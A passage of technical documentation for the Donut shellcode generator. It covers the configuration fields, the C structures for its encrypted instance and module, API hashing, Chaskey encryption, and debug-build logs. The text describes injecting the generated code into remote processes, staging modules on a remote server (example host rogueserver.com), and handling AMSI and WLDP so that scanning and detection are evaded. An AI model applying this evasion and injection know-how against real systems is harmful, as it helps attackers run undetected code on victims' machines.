48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
